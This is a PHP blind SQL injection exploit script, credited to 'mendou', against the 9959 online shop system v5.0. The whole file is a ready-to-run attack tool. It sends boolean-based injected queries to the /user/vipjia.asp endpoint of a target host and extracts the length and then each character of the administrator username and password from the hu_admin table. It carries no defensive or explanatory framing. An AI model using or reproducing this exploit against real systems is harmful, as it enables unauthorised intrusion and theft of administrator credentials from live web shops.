<?php
print_r('
+---------------------------------------------------------------------------+
9959网店系统 v5.0 Blind SQL injection exploit by mendou
官方网站:<a href="http://www.9959shop.com" target="_blank">www.9959shop.com</a>
+---------------------------------------------------------------------------+
');
if ($argc < 2) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host id
Example:
php '.$argv[0].' localhost id
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(0);
ini_set('max_execution_time', 0);
$host = $argv[1];
$str = "abcdefghijklmnopqrstuvwxyz0123456789";
$strlen =strlen($str);
$pid = $argv[2];
$n_len = lenstr(adminname); //用户长度
echo "用户长度:".$n_len."\r\n";
pojie("adminname",$n_len);echo "\r\n";
$p_len = lenstr(password); //密码长度
echo "密码长度:".$p_len."\r\n";
pojie("password",$p_len);
function pojie($str1,$len){
global $host,$strlen,$str,$pid;
for ($j=1 ; $j<=$len ; $j++){
for ($i=0 ; $i<$strlen ; $i++){
$exp = "%20and%20(select%20top%201%20mid(".$str1.",".$j.",1)%20from%20hu_admin)='".$str[$i]."'";
$a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
if (strpos($a,"次")==true){
echo $str[$i];break;
}
}
}
}
//判断 用户或者密码的长度函数
function lenstr($str){
global $host,$pid;
for ($i=1 ; $i <= 30; $i++){
$exp = "%20and%20(select%20top%201%20len(".$str.")%20from%20hu_admin)=".$i;
$a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
if (strpos($a,"次")==true){
return $i;
}
}
}
?>